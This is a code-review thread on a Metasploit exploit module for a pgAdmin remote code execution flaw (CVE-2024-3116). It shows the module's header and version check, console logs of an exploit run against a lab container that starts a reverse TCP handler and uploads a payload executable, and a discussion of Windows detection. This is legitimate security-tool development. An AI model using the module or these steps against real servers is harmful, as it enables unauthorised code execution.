modules/exploits/windows/http/pgadmin_binary_path_api.rb

```diff
@@ -0,0 +1,228 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'pgAdmin Binary Path API RCE',
+        'Description' => %q{
+          pgAdmin <= 8.4 is affected by a Remote Code Execution (RCE)
+          vulnerability through the validate binary path API. This vulnerability
+          allows attackers to execute arbitrary code on the server hosting PGAdmin,
+          posing a severe risk to the database management system's integrity and the security of the underlying data.
+
+          Tested on pgAdmin 8.4 on Windows 10 both authenticated and unauthenticated.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'M.Selim Karahan', # metasploit module
+          'Mustafa Mutlu', # lab prep. and QA
+          'Ayoub Mokhtar' # vulnerability discovery and write up
+        ],
+        'References' => [
+          [ 'CVE', '2024-3116'],
+          [ 'URL', 'https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/'],
+          [ 'URL', 'https://www.vicarius.io/vsociety/posts/remote-code-execution-vulnerability-in-pgadmin-cve-2024-3116']
+        ],
+        'Platform' => ['windows'],
+        'Arch' => ARCH_X64,
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2024-03-28',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'Reliability' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ],
+          'SideEffects' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8000),
+        OptString.new('USERNAME', [ false, 'User to login with', '']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+        OptString.new('TARGETURI', [ true, 'The URI of the Example Application', '/'])
+      ]
+    )
+  end
+
+  def check
+    version = get_version
+    return CheckCode::Unknown('Unable to determine the target version') unless version
+    return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.5')
+
+    CheckCode::Vulnerable("pgAdmin version #{version} is affected")
```

Comment:
Is there a way at all to detect if the host is running windows vs linux?

Target:

```
docker run --rm -it -p 5050:5050 vulhub/pgadmin:7.6
```

Module check:

```
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/pgadmin_binary_path_api) > check rhost=127.0.0.1 rport=5050 lhost=192.168.123.1
[+] 127.0.0.1:5050 - The target is vulnerable. pgAdmin version 7.6.0 is affected
```

Module run which won't work as the host isn't windows:

```
msf6 exploit(windows/http/pgadmin_binary_path_api) > exploit rhost=127.0.0.1 rport=5050 lhost=192.168.123.1 username=vulhub@example.com password=vulhub

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. pgAdmin version 7.6.0 is affected
[*] Successfully authenticated to pgAdmin
[*] Payload uploaded to: /var/lib/pgadmin/storage/vulhub_example.com/pg_restore.exe
[!] This exploit may require manual cleanup of '/var/lib/pgadmin/storage/vulhub_example.com/pg_restore.exe' on the target
[*] Exploit completed, but no session was created.
```

Reply:
It is possible, I can add this check if it is needed

Reply:
That would be perfect :+1:

Reply:
The vulnerability isn't specific to Windows I think, is it?

Reply:
I think the file write isn't specific to windows; but from the blog post it's easier to get execution triggered on windows:

> This write-up details the steps involved in creating and executing a malicious executable designed to exploit this vulnerability on Windows, along with an explanation of why such an exploit is impractical on *nix systems without explicit user intervention.
> https://ayoubmokhtar.com/post/remote_code_execution_pgadmin_8.4-cve-2024-3116/